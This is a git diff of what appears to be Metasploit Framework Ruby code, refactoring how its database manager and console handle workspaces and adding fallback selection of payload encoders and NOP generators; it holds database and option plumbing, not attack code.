|
||||||
|
#
|
||||||
|
# @param opts[:ids] [Array] Array containing Integers corresponding to the IDs of the note entries to delete.
|
||||||
|
# @return [Array] Array containing the Mdm::Note objects that were successfully deleted.
|
||||||
|
def delete_note(opts)
|
||||||
|
raise ArgumentError.new("The following options are required: :ids") if opts[:ids].nil?
|
||||||
|
|
||||||
|
::ActiveRecord::Base.connection_pool.with_connection {
|
||||||
|
deleted = []
|
||||||
|
opts[:ids].each do |note_id|
|
||||||
|
note = Mdm::Note.find(note_id)
|
||||||
|
begin
|
||||||
|
deleted << note.destroy
|
||||||
|
rescue # refs suck
|
||||||
|
elog("Forcibly deleting #{note}")
|
||||||
|
deleted << note.delete
|
||||||
|
end
|
||||||
|
end
|
||||||
|
|
||||||
|
return deleted
|
||||||
|
}
|
||||||
|
end
|
||||||
end
|
end
|
||||||
|
|
|
@ -78,7 +78,7 @@ module Msf::DBManager::Report
|
||||||
#
|
#
|
||||||
# This methods returns a list of all reports in the database
|
# This methods returns a list of all reports in the database
|
||||||
#
|
#
|
||||||
def reports(wspace=workspace)
|
def reports(wspace=framework.db.workspace)
|
||||||
::ActiveRecord::Base.connection_pool.with_connection {
|
::ActiveRecord::Base.connection_pool.with_connection {
|
||||||
wspace.reports
|
wspace.reports
|
||||||
}
|
}
|
||||||
|
|
|
@ -21,7 +21,7 @@ module Msf::DBManager::Service
|
||||||
|
|
||||||
# Iterates over the services table calling the supplied block with the
|
# Iterates over the services table calling the supplied block with the
|
||||||
# service instance of each entry.
|
# service instance of each entry.
|
||||||
def each_service(wspace=workspace, &block)
|
def each_service(wspace=framework.db.workspace, &block)
|
||||||
::ActiveRecord::Base.connection_pool.with_connection {
|
::ActiveRecord::Base.connection_pool.with_connection {
|
||||||
wspace.services.each do |service|
|
wspace.services.each do |service|
|
||||||
block.call(service)
|
block.call(service)
|
||||||
|
@ -61,7 +61,7 @@ module Msf::DBManager::Service
|
||||||
hname = opts.delete(:host_name)
|
hname = opts.delete(:host_name)
|
||||||
hmac = opts.delete(:mac)
|
hmac = opts.delete(:mac)
|
||||||
host = nil
|
host = nil
|
||||||
wspace = opts.delete(:workspace) || workspace
|
wspace = Msf::Util::DBManager.process_opts_workspace(opts, framework)
|
||||||
hopts = {:workspace => wspace, :host => addr}
|
hopts = {:workspace => wspace, :host => addr}
|
||||||
hopts[:name] = hname if hname
|
hopts[:name] = hname if hname
|
||||||
hopts[:mac] = hmac if hmac
|
hopts[:mac] = hmac if hmac
|
||||||
|
@ -141,10 +141,8 @@ module Msf::DBManager::Service
|
||||||
|
|
||||||
# Returns a list of all services in the database
|
# Returns a list of all services in the database
|
||||||
def services(opts)
|
def services(opts)
|
||||||
wspace = opts.delete(:workspace) || workspace
|
wspace = Msf::Util::DBManager.process_opts_workspace(opts, framework)
|
||||||
if wspace.kind_of? String
|
|
||||||
wspace = find_workspace(wspace)
|
|
||||||
end
|
|
||||||
search_term = opts.delete(:search_term)
|
search_term = opts.delete(:search_term)
|
||||||
opts["hosts.address"] = opts.delete(:addresses)
|
opts["hosts.address"] = opts.delete(:addresses)
|
||||||
opts.compact!
|
opts.compact!
|
||||||
|
|
|
@ -13,7 +13,7 @@ module Msf::DBManager::Session
|
||||||
def get_session(opts)
|
def get_session(opts)
|
||||||
return if not active
|
return if not active
|
||||||
::ActiveRecord::Base.connection_pool.with_connection {
|
::ActiveRecord::Base.connection_pool.with_connection {
|
||||||
wspace = opts[:workspace] || opts[:wspace] || workspace
|
wspace = Msf::Util::DBManager.process_opts_workspace(opts, framework)
|
||||||
addr = opts[:addr] || opts[:address] || opts[:host] || return
|
addr = opts[:addr] || opts[:address] || opts[:host] || return
|
||||||
host = get_host(:workspace => wspace, :host => addr)
|
host = get_host(:workspace => wspace, :host => addr)
|
||||||
time = opts[:opened_at] || opts[:created_at] || opts[:time] || return
|
time = opts[:opened_at] || opts[:created_at] || opts[:time] || return
|
||||||
|
@ -119,12 +119,12 @@ module Msf::DBManager::Session
|
||||||
return if not active
|
return if not active
|
||||||
|
|
||||||
::ActiveRecord::Base.connection_pool.with_connection {
|
::ActiveRecord::Base.connection_pool.with_connection {
|
||||||
workspace = find_workspace(session_dto[:workspace])
|
|
||||||
host_data = session_dto[:host_data]
|
host_data = session_dto[:host_data]
|
||||||
|
workspace = workspaces({ name: host_data[:workspace] })
|
||||||
h_opts = {}
|
h_opts = {}
|
||||||
h_opts[:host] = host_data[:host]
|
h_opts[:host] = host_data[:host]
|
||||||
h_opts[:arch] = host_data[:arch]
|
h_opts[:arch] = host_data[:arch]
|
||||||
h_opts[:workspace] = workspace
|
h_opts[:workspace] = host_data[:workspace]
|
||||||
host = find_or_create_host(h_opts)
|
host = find_or_create_host(h_opts)
|
||||||
|
|
||||||
session_data = session_dto[:session_data]
|
session_data = session_dto[:session_data]
|
||||||
|
|
|
@ -1,11 +1,6 @@
|
||||||
module Msf::DBManager::SessionEvent
|
module Msf::DBManager::SessionEvent
|
||||||
|
|
||||||
def session_events(opts)
|
def session_events(opts)
|
||||||
wspace = opts[:workspace] || opts[:wspace] || workspace
|
|
||||||
if wspace.kind_of? String
|
|
||||||
wspace = find_workspace(wspace)
|
|
||||||
end
|
|
||||||
|
|
||||||
::ActiveRecord::Base.connection_pool.with_connection {
|
::ActiveRecord::Base.connection_pool.with_connection {
|
||||||
conditions = {}
|
conditions = {}
|
||||||
|
|
||||||
|
|
|
@ -9,7 +9,7 @@ module Msf::DBManager::Task
|
||||||
def report_task(opts)
|
def report_task(opts)
|
||||||
return if not active
|
return if not active
|
||||||
::ActiveRecord::Base.connection_pool.with_connection {
|
::ActiveRecord::Base.connection_pool.with_connection {
|
||||||
wspace = opts.delete(:workspace) || workspace
|
wspace = Msf::Util::DBManager.process_opts_workspace(opts, framework)
|
||||||
path = opts.delete(:path) || (raise RuntimeError, "A task :path is required")
|
path = opts.delete(:path) || (raise RuntimeError, "A task :path is required")
|
||||||
|
|
||||||
ret = {}
|
ret = {}
|
||||||
|
@ -49,7 +49,7 @@ module Msf::DBManager::Task
|
||||||
#
|
#
|
||||||
# This methods returns a list of all tasks in the database
|
# This methods returns a list of all tasks in the database
|
||||||
#
|
#
|
||||||
def tasks(wspace=workspace)
|
def tasks(wspace=framework.db.workspace)
|
||||||
::ActiveRecord::Base.connection_pool.with_connection {
|
::ActiveRecord::Base.connection_pool.with_connection {
|
||||||
wspace.tasks
|
wspace.tasks
|
||||||
}
|
}
|
||||||
|
|
|
@ -3,7 +3,7 @@ module Msf::DBManager::Vuln
|
||||||
# This method iterates the vulns table calling the supplied block with the
|
# This method iterates the vulns table calling the supplied block with the
|
||||||
# vuln instance of each entry.
|
# vuln instance of each entry.
|
||||||
#
|
#
|
||||||
def each_vuln(wspace=workspace,&block)
|
def each_vuln(wspace=framework.db.workspace, &block)
|
||||||
::ActiveRecord::Base.connection_pool.with_connection {
|
::ActiveRecord::Base.connection_pool.with_connection {
|
||||||
wspace.vulns.each do |vulns|
|
wspace.vulns.each do |vulns|
|
||||||
block.call(vulns)
|
block.call(vulns)
|
||||||
|
@ -94,8 +94,7 @@ module Msf::DBManager::Vuln
|
||||||
info = opts[:info]
|
info = opts[:info]
|
||||||
|
|
||||||
::ActiveRecord::Base.connection_pool.with_connection {
|
::ActiveRecord::Base.connection_pool.with_connection {
|
||||||
|
wspace = Msf::Util::DBManager.process_opts_workspace(opts, framework)
|
||||||
wspace = opts.delete(:workspace) || workspace
|
|
||||||
exploited_at = opts[:exploited_at] || opts["exploited_at"]
|
exploited_at = opts[:exploited_at] || opts["exploited_at"]
|
||||||
details = opts.delete(:details)
|
details = opts.delete(:details)
|
||||||
rids = opts.delete(:ref_ids)
|
rids = opts.delete(:ref_ids)
|
||||||
|
@ -236,12 +235,8 @@ module Msf::DBManager::Vuln
|
||||||
# This methods returns a list of all vulnerabilities in the database
|
# This methods returns a list of all vulnerabilities in the database
|
||||||
#
|
#
|
||||||
def vulns(opts)
|
def vulns(opts)
|
||||||
wspace = opts.delete(:workspace) || opts.delete(:wspace) || workspace
|
|
||||||
if wspace.kind_of? String
|
|
||||||
wspace = find_workspace(wspace)
|
|
||||||
end
|
|
||||||
|
|
||||||
::ActiveRecord::Base.connection_pool.with_connection {
|
::ActiveRecord::Base.connection_pool.with_connection {
|
||||||
|
wspace = Msf::Util::DBManager.process_opts_workspace(opts, framework)
|
||||||
|
|
||||||
search_term = opts.delete(:search_term)
|
search_term = opts.delete(:search_term)
|
||||||
if search_term && !search_term.empty?
|
if search_term && !search_term.empty?
|
||||||
|
@ -259,17 +254,12 @@ module Msf::DBManager::Vuln
|
||||||
# @param opts [Hash] Hash containing the updated values. Key should match the attribute to update. Must contain :id of record to update.
|
# @param opts [Hash] Hash containing the updated values. Key should match the attribute to update. Must contain :id of record to update.
|
||||||
# @return [Mdm::Vuln] The updated Mdm::Vuln object.
|
# @return [Mdm::Vuln] The updated Mdm::Vuln object.
|
||||||
def update_vuln(opts)
|
def update_vuln(opts)
|
||||||
# process workspace string for update if included in opts
|
::ActiveRecord::Base.connection_pool.with_connection {
|
||||||
wspace = opts.delete(:workspace)
|
wspace = Msf::Util::DBManager.process_opts_workspace(opts, framework, false)
|
||||||
if wspace.kind_of? String
|
opts[:workspace] = wspace if wspace
|
||||||
wspace = find_workspace(wspace)
|
id = opts.delete(:id)
|
||||||
opts[:workspace] = wspace
|
Mdm::Vuln.update(id, opts)
|
||||||
end
|
}
|
||||||
|
|
||||||
::ActiveRecord::Base.connection_pool.with_connection {
|
|
||||||
id = opts.delete(:id)
|
|
||||||
Mdm::Vuln.update(id, opts)
|
|
||||||
}
|
|
||||||
end
|
end
|
||||||
|
|
||||||
# Deletes Vuln entries based on the IDs passed in.
|
# Deletes Vuln entries based on the IDs passed in.
|
||||||
|
@ -279,19 +269,19 @@ module Msf::DBManager::Vuln
|
||||||
def delete_vuln(opts)
|
def delete_vuln(opts)
|
||||||
raise ArgumentError.new("The following options are required: :ids") if opts[:ids].nil?
|
raise ArgumentError.new("The following options are required: :ids") if opts[:ids].nil?
|
||||||
|
|
||||||
::ActiveRecord::Base.connection_pool.with_connection {
|
::ActiveRecord::Base.connection_pool.with_connection {
|
||||||
deleted = []
|
deleted = []
|
||||||
opts[:ids].each do |vuln_id|
|
opts[:ids].each do |vuln_id|
|
||||||
vuln = Mdm::Vuln.find(vuln_id)
|
vuln = Mdm::Vuln.find(vuln_id)
|
||||||
begin
|
begin
|
||||||
deleted << vuln.destroy
|
deleted << vuln.destroy
|
||||||
rescue # refs suck
|
rescue # refs suck
|
||||||
elog("Forcibly deleting #{vuln}")
|
elog("Forcibly deleting #{vuln}")
|
||||||
deleted << vuln.delete
|
deleted << vuln.delete
|
||||||
end
|
|
||||||
end
|
end
|
||||||
|
end
|
||||||
|
|
||||||
return deleted
|
return deleted
|
||||||
}
|
}
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
|
@ -22,20 +22,17 @@ module Msf::DBManager::VulnAttempt
|
||||||
# This methods returns a list of all vulnerability attempts in the database
|
# This methods returns a list of all vulnerability attempts in the database
|
||||||
#
|
#
|
||||||
def vuln_attempts(opts)
|
def vuln_attempts(opts)
|
||||||
wspace = opts.delete(:workspace) || opts.delete(:wspace) || workspace
|
::ActiveRecord::Base.connection_pool.with_connection {
|
||||||
if wspace.kind_of? String
|
# 'workspace' is not a valid attribute for Mdm::VulnAttempt. Remove it.
|
||||||
wspace = find_workspace(wspace)
|
Msf::Util::DBManager.delete_opts_workspace(opts)
|
||||||
|
|
||||||
|
search_term = opts.delete(:search_term)
|
||||||
|
if search_term && !search_term.empty?
|
||||||
|
column_search_conditions = Msf::Util::DBManager.create_all_column_search_conditions(Mdm::VulnAttempt, search_term)
|
||||||
|
Mdm::VulnAttempt.where(opts).where(column_search_conditions)
|
||||||
|
else
|
||||||
|
Mdm::VulnAttempt.where(opts)
|
||||||
end
|
end
|
||||||
|
}
|
||||||
::ActiveRecord::Base.connection_pool.with_connection {
|
|
||||||
|
|
||||||
search_term = opts.delete(:search_term)
|
|
||||||
if search_term && !search_term.empty?
|
|
||||||
column_search_conditions = Msf::Util::DBManager.create_all_column_search_conditions(Mdm::VulnAttempt, search_term)
|
|
||||||
Mdm::VulnAttempt.where(opts).where(column_search_conditions)
|
|
||||||
else
|
|
||||||
Mdm::VulnAttempt.where(opts)
|
|
||||||
end
|
|
||||||
}
|
|
||||||
end
|
end
|
||||||
end
|
end
|
|
@ -20,7 +20,7 @@ module Msf::DBManager::Web
|
||||||
def report_web_form(opts)
|
def report_web_form(opts)
|
||||||
return if not active
|
return if not active
|
||||||
::ActiveRecord::Base.connection_pool.with_connection {
|
::ActiveRecord::Base.connection_pool.with_connection {
|
||||||
wspace = opts.delete(:workspace) || workspace
|
wspace = Msf::Util::DBManager.process_opts_workspace(opts, framework)
|
||||||
|
|
||||||
path = opts[:path]
|
path = opts[:path]
|
||||||
meth = opts[:method].to_s.upcase
|
meth = opts[:method].to_s.upcase
|
||||||
|
@ -107,7 +107,7 @@ module Msf::DBManager::Web
|
||||||
def report_web_page(opts)
|
def report_web_page(opts)
|
||||||
return if not active
|
return if not active
|
||||||
::ActiveRecord::Base.connection_pool.with_connection {
|
::ActiveRecord::Base.connection_pool.with_connection {
|
||||||
wspace = opts.delete(:workspace) || workspace
|
wspace = Msf::Util::DBManager.process_opts_workspace(opts, framework)
|
||||||
|
|
||||||
path = opts[:path]
|
path = opts[:path]
|
||||||
code = opts[:code].to_i
|
code = opts[:code].to_i
|
||||||
|
@ -188,7 +188,7 @@ module Msf::DBManager::Web
|
||||||
def report_web_site(opts)
|
def report_web_site(opts)
|
||||||
return if not active
|
return if not active
|
||||||
::ActiveRecord::Base.connection_pool.with_connection { |conn|
|
::ActiveRecord::Base.connection_pool.with_connection { |conn|
|
||||||
wspace = opts.delete(:workspace) || workspace
|
wspace = Msf::Util::DBManager.process_opts_workspace(opts, framework)
|
||||||
vhost = opts.delete(:vhost)
|
vhost = opts.delete(:vhost)
|
||||||
|
|
||||||
addr = nil
|
addr = nil
|
||||||
|
@ -289,7 +289,7 @@ module Msf::DBManager::Web
|
||||||
def report_web_vuln(opts)
|
def report_web_vuln(opts)
|
||||||
return if not active
|
return if not active
|
||||||
::ActiveRecord::Base.connection_pool.with_connection {
|
::ActiveRecord::Base.connection_pool.with_connection {
|
||||||
wspace = opts.delete(:workspace) || workspace
|
wspace = Msf::Util::DBManager.process_opts_workspace(opts, framework)
|
||||||
|
|
||||||
path = opts[:path]
|
path = opts[:path]
|
||||||
meth = opts[:method]
|
meth = opts[:method]
|
||||||
|
|
|
@ -1,17 +1,24 @@
|
||||||
module Msf::DBManager::Workspace
|
module Msf::DBManager::Workspace
|
||||||
|
|
||||||
|
DEFAULT_WORKSPACE_NAME = 'default'
|
||||||
#
|
#
|
||||||
# Creates a new workspace in the database
|
# Creates a new workspace in the database
|
||||||
#
|
#
|
||||||
def add_workspace(name)
|
def add_workspace(opts)
|
||||||
::ActiveRecord::Base.connection_pool.with_connection {
|
::ActiveRecord::Base.connection_pool.with_connection {
|
||||||
::Mdm::Workspace.where(name: name).first_or_create
|
::Mdm::Workspace.where(name: opts[:name]).first_or_create
|
||||||
}
|
}
|
||||||
end
|
end
|
||||||
|
|
||||||
def default_workspace
|
def default_workspace
|
||||||
::ActiveRecord::Base.connection_pool.with_connection {
|
# Workspace tracking is handled on the client side, so attempting to call it directly from the DbManager
|
||||||
::Mdm::Workspace.default
|
# will not return the correct results. Run it back through the proxy.
|
||||||
}
|
|
||||||
|
|
||||||
|
wlog "[DEPRECATION] Setting the workspace from within DbManager is no longer supported. Please call from WorkspaceDataProxy instead."
|
||||||
|
|
||||||
|
# Proxied to fix tests, will be cleaned up in remote test patch
|
||||||
|
framework.db.default_workspace
|
||||||
end
|
end
|
||||||
|
|
||||||
def find_workspace(name)
|
def find_workspace(name)
|
||||||
|
@ -21,102 +28,75 @@ module Msf::DBManager::Workspace
|
||||||
end
|
end
|
||||||
|
|
||||||
def workspace
|
def workspace
|
||||||
framework.db.find_workspace(@workspace_name)
|
# The @current_workspace is tracked on the client side, so attempting to call it directly from the DbManager
|
||||||
|
# will not return the correct results. Run it back through the proxy.
|
||||||
|
wlog "[DEPRECATION] Calling workspace from within DbManager is no longer supported. Please call from WorkspaceDataProxy instead."
|
||||||
|
|
||||||
|
# Proxied to fix tests, will be cleaned up in remote test patch
|
||||||
|
framework.db.workspace
|
||||||
end
|
end
|
||||||
|
|
||||||
def workspace=(workspace)
|
def workspace=(workspace)
|
||||||
@workspace_name = workspace.name
|
# The @current_workspace is tracked on the client side, so attempting to call it directly from the DbManager
|
||||||
|
# will not return the correct results. Run it back through the proxy.
|
||||||
|
wlog "[DEPRECATION] Setting the workspace from within DbManager is no longer supported. Please call from WorkspaceDataProxy instead."
|
||||||
|
|
||||||
|
# Proxied to fix tests, will be cleaned up in remote test patch
|
||||||
|
framework.db.workspace=workspace
|
||||||
end
|
end
|
||||||
|
|
||||||
def workspaces
|
def workspaces(opts = {})
|
||||||
::ActiveRecord::Base.connection_pool.with_connection {
|
::ActiveRecord::Base.connection_pool.with_connection {
|
||||||
::Mdm::Workspace.order('updated_at asc').load
|
search_term = opts.delete(:search_term)
|
||||||
|
# Passing these values to the search will cause exceptions, so remove them if they accidentally got passed in.
|
||||||
|
Msf::Util::DBManager.delete_opts_workspace(opts)
|
||||||
|
|
||||||
|
::ActiveRecord::Base.connection_pool.with_connection {
|
||||||
|
if search_term && !search_term.empty?
|
||||||
|
column_search_conditions = Msf::Util::DBManager.create_all_column_search_conditions(Mdm::Workspace, search_term)
|
||||||
|
Mdm::Workspace.where(opts).where(column_search_conditions)
|
||||||
|
else
|
||||||
|
Mdm::Workspace.where(opts)
|
||||||
|
end
|
||||||
|
}
|
||||||
}
|
}
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
def delete_workspaces(opts)
|
||||||
# Returns an array of all the associated workspace records counts.
|
raise ArgumentError.new("The following options are required: :ids") if opts[:ids].nil?
|
||||||
#
|
|
||||||
def workspace_associations_counts()
|
|
||||||
results = Array.new()
|
|
||||||
|
|
||||||
::ActiveRecord::Base.connection_pool.with_connection {
|
::ActiveRecord::Base.connection_pool.with_connection {
|
||||||
workspaces.each do |ws|
|
deleted = []
|
||||||
results << {
|
default_deleted = false
|
||||||
:name => ws.name,
|
opts[:ids].each do |ws_id|
|
||||||
:hosts_count => ws.hosts.count,
|
ws = Mdm::Workspace.find(ws_id)
|
||||||
:services_count => ws.services.count,
|
default_deleted = true if ws.default?
|
||||||
:vulns_count => ws.vulns.count,
|
begin
|
||||||
:creds_count => ws.core_credentials.count,
|
deleted << ws.destroy
|
||||||
:loots_count => ws.loots.count,
|
if default_deleted
|
||||||
:notes_count => ws.notes.count
|
add_workspace({ name: DEFAULT_WORKSPACE_NAME })
|
||||||
}
|
default_deleted = false
|
||||||
end
|
end
|
||||||
}
|
rescue
|
||||||
|
elog("Forcibly deleting #{ws.name}")
|
||||||
return results
|
deleted << ws.delete
|
||||||
end
|
|
||||||
|
|
||||||
def delete_all_workspaces()
|
|
||||||
return delete_workspaces(workspaces.map(&:name))
|
|
||||||
end
|
|
||||||
|
|
||||||
def delete_workspaces(names)
|
|
||||||
status_msg = []
|
|
||||||
error_msg = []
|
|
||||||
|
|
||||||
switched = false
|
|
||||||
# Delete workspaces
|
|
||||||
names.each do |name|
|
|
||||||
workspace = framework.db.find_workspace(name)
|
|
||||||
if workspace.nil?
|
|
||||||
error_msg << "Workspace not found: #{name}"
|
|
||||||
elsif workspace.default?
|
|
||||||
workspace.destroy
|
|
||||||
workspace = framework.db.add_workspace(name)
|
|
||||||
status_msg << 'Deleted and recreated the default workspace'
|
|
||||||
else
|
|
||||||
# switch to the default workspace if we're about to delete the current one
|
|
||||||
if framework.db.workspace.name == workspace.name
|
|
||||||
framework.db.workspace = framework.db.default_workspace
|
|
||||||
switched = true
|
|
||||||
end
|
end
|
||||||
# now destroy the named workspace
|
|
||||||
workspace.destroy
|
|
||||||
status_msg << "Deleted workspace: #{name}"
|
|
||||||
end
|
end
|
||||||
end
|
|
||||||
(status_msg << "Switched workspace: #{framework.db.workspace.name}") if switched
|
return deleted
|
||||||
return status_msg, error_msg
|
}
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
def update_workspace(opts)
|
||||||
# Renames a workspace
|
raise ArgumentError.new("The following options are required: :id") if opts[:id].nil?
|
||||||
#
|
Msf::Util::DBManager.delete_opts_workspace(opts)
|
||||||
def rename_workspace(from_name, to_name)
|
|
||||||
raise "Workspace exists: #{to_name}" if framework.db.find_workspace(to_name)
|
|
||||||
|
|
||||||
workspace = find_workspace(from_name)
|
::ActiveRecord::Base.connection_pool.with_connection {
|
||||||
raise "Workspace not found: #{name}" if workspace.nil?
|
ws_to_update = workspaces({ id: opts.delete(:id) }).first
|
||||||
|
default_renamed = true if ws_to_update.name == DEFAULT_WORKSPACE_NAME
|
||||||
workspace.name = new
|
updated_ws = Mdm::Workspace.update(ws_to_update.id, opts)
|
||||||
workspace.save!
|
add_workspace({ name: DEFAULT_WORKSPACE_NAME }) if default_renamed
|
||||||
|
updated_ws
|
||||||
# Recreate the default workspace to avoid errors
|
}
|
||||||
if workspace.default?
|
|
||||||
framework.db.add_workspace(from_name)
|
|
||||||
#print_status("Recreated default workspace after rename")
|
|
||||||
end
|
|
||||||
|
|
||||||
# Switch to new workspace if old name was active
|
|
||||||
if (@workspace_name == workspace.name)
|
|
||||||
framework.db.workspace = workspace
|
|
||||||
#print_status("Switched workspace: #{framework.db.workspace.name}")
|
|
||||||
end
|
|
||||||
end
|
|
||||||
|
|
||||||
def get_workspace(opts)
|
|
||||||
workspace = opts.delete(:wspace) || opts.delete(:workspace) || workspace
|
|
||||||
find_workspace(workspace) if (workspace.is_a?(String))
|
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
|
@ -550,8 +550,8 @@ class Exploit < Msf::Module
|
||||||
reqs['AppendEncoder'] = payload_append_encoder(explicit_target)
|
reqs['AppendEncoder'] = payload_append_encoder(explicit_target)
|
||||||
reqs['MaxNops'] = payload_max_nops(explicit_target)
|
reqs['MaxNops'] = payload_max_nops(explicit_target)
|
||||||
reqs['MinNops'] = payload_min_nops(explicit_target)
|
reqs['MinNops'] = payload_min_nops(explicit_target)
|
||||||
reqs['Encoder'] = datastore['ENCODER']
|
reqs['Encoder'] = datastore['ENCODER'] || payload_encoder(explicit_target)
|
||||||
reqs['Nop'] = datastore['NOP']
|
reqs['Nop'] = datastore['NOP'] || payload_nop(explicit_target)
|
||||||
reqs['EncoderType'] = payload_encoder_type(explicit_target)
|
reqs['EncoderType'] = payload_encoder_type(explicit_target)
|
||||||
reqs['EncoderOptions'] = payload_encoder_options(explicit_target)
|
reqs['EncoderOptions'] = payload_encoder_options(explicit_target)
|
||||||
reqs['ExtendedOptions'] = payload_extended_options(explicit_target)
|
reqs['ExtendedOptions'] = payload_extended_options(explicit_target)
|
||||||
|
@ -916,9 +916,37 @@ class Exploit < Msf::Module
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
|
#
|
||||||
|
# Returns the payload encoder that is associated with either the
|
||||||
|
# current target or the exploit in general.
|
||||||
|
#
|
||||||
|
def payload_encoder(explicit_target = nil)
|
||||||
|
explicit_target ||= target
|
||||||
|
|
||||||
|
if (explicit_target and explicit_target.payload_encoder)
|
||||||
|
explicit_target.payload_encoder
|
||||||
|
else
|
||||||
|
payload_info['Encoder']
|
||||||
|
end
|
||||||
|
end
|
||||||
|
|
||||||
|
#
|
||||||
|
# Returns the payload NOP generator that is associated with either the
|
||||||
|
# current target or the exploit in general.
|
||||||
|
#
|
||||||
|
def payload_nop(explicit_target = nil)
|
||||||
|
explicit_target ||= target
|
||||||
|
|
||||||
|
if (explicit_target and explicit_target.payload_nop)
|
||||||
|
explicit_target.payload_nop
|
||||||
|
else
|
||||||
|
payload_info['Nop']
|
||||||
|
end
|
||||||
|
end
|
||||||
|
|
||||||
#
|
#
|
||||||
# Returns the payload encoder type that is associated with either the
|
# Returns the payload encoder type that is associated with either the
|
||||||
# current target of the exploit in general.
|
# current target or the exploit in general.
|
||||||
#
|
#
|
||||||
def payload_encoder_type(explicit_target = nil)
|
def payload_encoder_type(explicit_target = nil)
|
||||||
explicit_target ||= target
|
explicit_target ||= target
|
||||||
|
|
|
@ -233,6 +233,22 @@ class Msf::Module::Target
|
||||||
opts['Payload'] ? opts['Payload']['Space'] : nil
|
opts['Payload'] ? opts['Payload']['Space'] : nil
|
||||||
end
|
end
|
||||||
|
|
||||||
|
#
|
||||||
|
# The payload encoder or encoders that can be used when generating the
|
||||||
|
# encoded payload (such as x86/shikata_ga_nai and so on).
|
||||||
|
#
|
||||||
|
def payload_encoder
|
||||||
|
opts['Payload'] ? opts['Payload']['Encoder'] : nil
|
||||||
|
end
|
||||||
|
|
||||||
|
#
|
||||||
|
# The payload NOP generator or generators that can be used when generating the
|
||||||
|
# encoded payload (such as x86/opty2 and so on).
|
||||||
|
#
|
||||||
|
def payload_nop
|
||||||
|
opts['Payload'] ? opts['Payload']['Nop'] : nil
|
||||||
|
end
|
||||||
|
|
||||||
#
|
#
|
||||||
# The payload encoder type or types that can be used when generating the
|
# The payload encoder type or types that can be used when generating the
|
||||||
# encoded payload (such as alphanum, unicode, xor, and so on).
|
# encoded payload (such as alphanum, unicode, xor, and so on).
|
||||||
|
|
|
@ -142,26 +142,76 @@ class Db
|
||||||
|
|
||||||
if adding and names
|
if adding and names
|
||||||
# Add workspaces
|
# Add workspaces
|
||||||
workspace = nil
|
wspace = nil
|
||||||
names.each do |name|
|
names.each do |name|
|
||||||
workspace = framework.db.add_workspace(name)
|
wspace = framework.db.workspaces(name: name).first
|
||||||
print_status("Added workspace: #{workspace.name}")
|
if wspace
|
||||||
|
print_status("Workspace '#{wspace.name}' already existed, switching to it.")
|
||||||
|
else
|
||||||
|
wspace = framework.db.add_workspace(name)
|
||||||
|
print_status("Added workspace: #{wspace.name}")
|
||||||
|
end
|
||||||
end
|
end
|
||||||
framework.db.workspace = workspace
|
framework.db.workspace = wspace
|
||||||
|
print_status("Workspace: #{framework.db.workspace.name}")
|
||||||
elsif deleting and names
|
elsif deleting and names
|
||||||
status_msg, error_msg = framework.db.delete_workspaces(names)
|
ws_ids_to_delete = []
|
||||||
print_msgs(status_msg, error_msg)
|
starting_ws = framework.db.workspace
|
||||||
|
names.uniq.each do |n|
|
||||||
|
ws = framework.db.workspaces(name: n).first
|
||||||
|
ws_ids_to_delete << ws.id if ws
|
||||||
|
end
|
||||||
|
if ws_ids_to_delete.count > 0
|
||||||
|
deleted = framework.db.delete_workspaces(ids: ws_ids_to_delete)
|
||||||
|
process_deleted_workspaces(deleted, starting_ws)
|
||||||
|
else
|
||||||
|
print_status("No workspaces matching the given name(s) were found.")
|
||||||
|
end
|
||||||
elsif delete_all
|
elsif delete_all
|
||||||
status_msg, error_msg = framework.db.delete_all_workspaces()
|
ws_ids_to_delete = []
|
||||||
print_msgs(status_msg, error_msg)
|
starting_ws = framework.db.workspace
|
||||||
|
framework.db.workspaces.each do |ws|
|
||||||
|
ws_ids_to_delete << ws.id
|
||||||
|
end
|
||||||
|
deleted = framework.db.delete_workspaces(ids: ws_ids_to_delete)
|
||||||
|
process_deleted_workspaces(deleted, starting_ws)
|
||||||
elsif renaming
|
elsif renaming
|
||||||
if names.length != 2
|
if names.length != 2
|
||||||
print_error("Wrong number of arguments to rename")
|
print_error("Wrong number of arguments to rename")
|
||||||
return
|
return
|
||||||
end
|
end
|
||||||
|
|
||||||
old, new = names
|
ws_to_update = framework.db.find_workspace(names.first)
|
||||||
framework.db.rename_workspace(old, new)
|
unless ws_to_update
|
||||||
|
print_error("Workspace '#{names.first}' does not exist")
|
||||||
|
return
|
||||||
|
end
|
||||||
|
opts = {
|
||||||
|
id: ws_to_update.id,
|
||||||
|
name: names.last
|
||||||
|
}
|
||||||
|
begin
|
||||||
|
if names.last == Msf::DBManager::Workspace::DEFAULT_WORKSPACE_NAME
|
||||||
|
print_error("Unable to rename a workspace to '#{Msf::DBManager::Workspace::DEFAULT_WORKSPACE_NAME}'")
|
||||||
|
return
|
||||||
|
end
|
||||||
|
updated_ws = framework.db.update_workspace(opts)
|
||||||
|
if updated_ws
|
||||||
|
framework.db.workspace = updated_ws if names.first == framework.db.workspace.name
|
||||||
|
print_status("Renamed workspace '#{names.first}' to '#{updated_ws.name}'")
|
||||||
|
else
|
||||||
|
print_error "There was a problem updating the workspace. Setting to the default workspace."
|
||||||
|
framework.db.workspace = framework.db.default_workspace
|
||||||
|
return
|
||||||
|
end
|
||||||
|
if names.first == Msf::DBManager::Workspace::DEFAULT_WORKSPACE_NAME
|
||||||
|
print_status("Recreated default workspace")
|
||||||
|
end
|
||||||
|
rescue Exception => e
|
||||||
|
print_error "Failed to rename workspace: #{e.message}"
|
||||||
|
e.backtrace.each { |line| print_error "#{line}"}
|
||||||
|
end
|
||||||
|
|
||||||
elsif names
|
elsif names
|
||||||
name = names.last
|
name = names.last
|
||||||
# Switch workspace
|
# Switch workspace
|
||||||
|
@ -174,12 +224,12 @@ class Db
|
||||||
return
|
return
|
||||||
end
|
end
|
||||||
else
|
else
|
||||||
workspace = framework.db.workspace
|
current_workspace = framework.db.workspace
|
||||||
|
|
||||||
unless verbose
|
unless verbose
|
||||||
current = nil
|
current = nil
|
||||||
framework.db.workspaces.sort_by {|s| s.name}.each do |s|
|
framework.db.workspaces.sort_by {|s| s.name}.each do |s|
|
||||||
if s.name == workspace.name
|
if s.name == current_workspace.name
|
||||||
current = s.name
|
current = s.name
|
||||||
else
|
else
|
||||||
print_line(" #{s.name}")
|
print_line(" #{s.name}")
|
||||||
|
